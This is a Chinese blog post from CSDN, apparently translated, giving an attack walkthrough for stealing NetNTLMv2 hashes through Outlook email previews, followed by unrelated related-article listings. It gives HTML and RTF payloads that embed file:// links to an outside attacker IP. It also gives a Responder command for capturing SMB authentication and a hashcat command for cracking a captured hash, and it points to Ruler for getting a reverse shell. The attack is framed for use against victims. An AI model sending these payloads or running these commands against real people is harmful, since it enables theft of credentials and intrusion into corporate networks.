使用 Outlook 窃取 NetNTLMv2 哈希

最新推荐文章于 2024-07-07 12:10:24 发布
最新推荐文章于 2024-07-07 12:10:24 发布
阅读量326 收藏 6
点赞数 12
分类专栏: 网络安全 文章标签: outlook 哈希算法 算法 安全 网络 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aihua002/article/details/139887769
版权
前言

如果目标系统没有运行最新版本的 Windows/Outlook,则可以制作这样的电子邮件,允许攻击者窃取受害者的 NetNTLMv2 哈希值,而无需用户进行任何交互 - 单击电子邮件预览它足以窃取哈希值。

武器化

让我们创建一个包含以下内容的新 HTML 文件:

<html>
    <h1>holla good sir</h1>
    <img src="file://157.230.60.143/download.jpg">
</html>

RTF 文件也有效:

{\rtf1{\field{\*\fldinst {INCLUDEPICTURE "file://157.230.60.143/test.jpg" \\* MERGEFORMAT\\d}}{\fldrslt}}}

然后通过单击窗口标题栏顶部的附件图标插入新文件:

图片

选择恶意messge.html,然后选择:Insert as Text

图片

您应该看到您的消息现在看起来像一个带有损坏图像的 HTML(在我们的例子中是预期的,因为图像的路径是假的):

图片

执行

启动以侦听来自受害者的传入 SMB 身份验证请求Responder

responder -I eth1 -v

.并将恶意电子邮件发送给受害者。

受害者视图

一旦受害者打开他们的 Outlook 并单击恶意电子邮件进行预览,他们的计算机将尝试向攻击者控制的服务器(运行 Responder)进行身份验证。这会将受害者的哈希值泄露给攻击者,然后他们可以尝试破解:NetNTLMv2

图片

一旦哈希值被盗,我们可以尝试破解它:

hashcat -m5600 'spotless::OFFENSE:6bdb56c8140cf8dc:FFEF94D55C2EB2DE8CF13F140687AD7A:0101000000000000A5A01FB2BE9ED401114D47C1916811640000000002000E004E004F004D00410054004300480001000A0053004D0042003100320004000A0053004D0042003100320003000A0053004D0042003100320005000A0053004D004200310032000800300030000000000000000000000000200000407D7D30819F03909981529F6ACA84502CFCC8B3555DBA34316F8914973DD03C0A0010000000000000000000000000000000000009001A0063006900660073002F00310030002E0030002E0030002E0035000000000000000000' -a 3 /usr/share/wordlists/rockyou.txt --force --potfile-disable

在这种情况下,我们可以看到用户有一个非常简单的密码,该密码立即被破解:

图片

下一步是使用 Ruler 从受害者公司网络获取反向 shell:

梦中北山
关注
  • 12
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用hashcat获取哈希
weixin_46021205的博客
02-04 1万+
前期准备 破解压缩包密码需要用到两个工具,分别是John the Ripper jumbo和hashcat。这两款软件分别下载windows版和binaries版就可以在windows上运行了。两个软件都是开源软件,所以也不用担心病毒。 还需要准备一个有密码的压缩包,这里以rar压缩包为例。 最后因为要使用GPU来运算,可能需要预先安装cuda环境之类的,这点没有深入研究。 获取压缩包哈希值 在john的路径中打开cmd:打开john\run\文件夹,在地址栏中输入cmd然后回车就行。 获取压缩包的路径,
C++代码中使用哈希
树欲静静风不止止的博客
08-30 2743
C++代码中如何使用哈希
哈希树简介
Dablelv 的博客专栏。
03-28 2924
哈希树(Hash Tree),在密码学及计算机科学中是一种树形数据结构,每个叶节点均以数据块的哈希作为标签,而除了叶节点以外的节点则以其子节点标签的加密哈希作为标签。哈希树能够高效、安全地验证大型数据结构的内容,是哈希链的推广形式。哈希树的概念由瑞夫·墨克于 1979 年申请专利,故亦称墨克树(Merkle tree)。
glib使用哈希
村中少年的专栏
03-13 3007
我的glib学习之旅从哈希表开始。了解到了glib库这个很方便强大的库,正巧写程序的时候使用了一下,在这里做一次总结,基于glib-2.50.3源码。
一文看懂哈希表并学会使用C++ STL 中的哈希
Peealy的博客
05-17 4万+
    最近在刷题以及做编程练习的作业时经常会用到哈希表,碰到一些想用的函数时每次都看别人的博客,现结合别人的博客对哈希表做个总结。 本篇哈希表的作用如何使用STL库中的哈希表STL中哈希表的常用函数 哈希表的作用 如何使用STL库中的哈希表 STL中哈希表的常用函数 ...
C++哈希表的实现
Wzs040810的博客
12-23 5449
C++哈希表的实现
一致性哈希算法原理详解
热门推荐
张维鹏的博客
10-17 4万+
(1)一致性哈希算法将整个哈希值空间按照顺时针方向组织成一个虚拟的圆环,称为 Hash 环; (2)接着将各个服务器使用 Hash 函数进行哈希,具体可以选择服务器的IP或主机名作为关键字进行哈希,从而确定每台机器在哈希环上的位置; (3)最后使用算法定位数据访问到相应服务器:将数据key使用相同的函数Hash计算出哈希值,并确定此数据在环上的位置,从此位置沿环顺时针寻找,第一台遇到的服务器就是其应该定位到的服务器
使用Windows自带命令校验文件哈希
末初的CSDN博客
05-03 6750
Certutil是一个windows预装的CLI程序,主要作用是转储和显示证书颁发机构(CA),配置信息,证书服务, CA 组件的备份和还原以及验证证书、密钥对和证书链,它作为证书服务的一部分安装。可用于校验文件MD5、SHA1、SHA256,下载恶意文件和免杀。 这里记录如何使用这个程序校验文件,网上很多资源的下载很多都会提供文件的md5,SHA256等等之类的哈希值,便于下载者校验文件是否...
Java 哈希表的使用方法
qq_43291551的博客
07-25 2790
booleancontains(Objectvalue)——-确定哈希表内是否包含了给定的对象,若有返回true,否则false。
利用打印机窃取目标系统哈希值.pdf
12-04
利用打印机窃取目标系统哈希值,获取目标系统的高级权限,通过其他系统连接打印机的信息。网络上的打印机的配置文件修改方法。
main(2).cpp哈希
06-08
main(2).cpp哈希
nimSHA2:安全哈希算法2
05-26
final () 或者: let digest = computeSHA256 ( "test SHA256" ) 转换: 要将摘要转换为字符串,请使用proc $ 要将摘要转换为十六进制字符串,请使用toHex 每个版本的SHA2哈希函数将根据其名称生成输出:SHA224生成...
Go语言常见哈希函数的使用
01-20
myhash.go /** * Created with IntelliJ IDEA. * User: liaojie * Date: 12-9-8 * Time: 下午3:53 * To change this template use File | Settings | File Templates. */ package main ... io
哈希表-使用C++实现的分布式哈希表.zip
03-04
2. 实现节点之间的发现和连接机制,比如使用UDP广播或已知种子节点来启动网络。 3. 设计路由算法,如Chord或Kademlia中的算法,使节点能够找到存储特定键的正确位置。 4. 实现数据存储和检索操作,包括数据的序列化...
Outlook发送大文件的问题是什么?怎么解决?
文件数据安全交换
07-02 742
上述均是从用户体验侧的缺陷,如果Outlook邮箱作为企业的官方业务沟通邮箱,那Outlook邮箱最大的缺陷毫无疑问就是Outlook发送大文件的问题,由于Outlook邮箱的附件上传大小一般为50M,且附件的传输速率较慢,极为影响业务的开展,因此,Outlook发送大文件是Outlook邮箱作为企业业务邮箱的最核心问题。邮箱界面设计:Outlook的邮箱界面设计可能不够友好,例如标签的色调较淡,已回复邮件的标识也不明显,这可能会给近视或色弱人群带来不便。可以设置在收件人下载附件时,自动通知发件人。
[Leetcode 136][Easy]-只出现一次的数字
2201_75413354的博客
07-03 198
②后面研究,发现对于对于查找数组中唯一一个出现一次的元素,我们更适合使用线性扫描和位操作的方法。异或运算满足交换律,且一个数异或自己结果是0,一个数异或0结果是自己。因此把数组中所有元素进行异或运算,得到结果是唯一数。①首先看到数组中重复的数字,想到快慢指针,但是数组的元素是乱序的不好求。使用了STL库的sort函数,时间复杂度O(nlogn)不符合题目要求,空间复杂度O(1)。
算法】大衍数算法
qq_33502371的博客
07-05 357
大衍数算法,特别是“大衍求一术”和“大衍总数术”,是中国古代数学中的杰出成就,尤其体现在南宋数学家秦九韶的《数书九章》中。
算法012:将x减到0的最小操作数
最新发布
m0_62319039的博客
07-07 312
算法012:将x减到0的最小操作数
使用python计算文件的哈希函数
04-01
可以使用Python内置的hashlib模块来计算文件的哈希值。以下是一个示例代码: ```python import hashlib def hash_file(filename): """"该函数接受文件名并返回文件的哈希值""" hasher = hashlib.sha1() # 使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值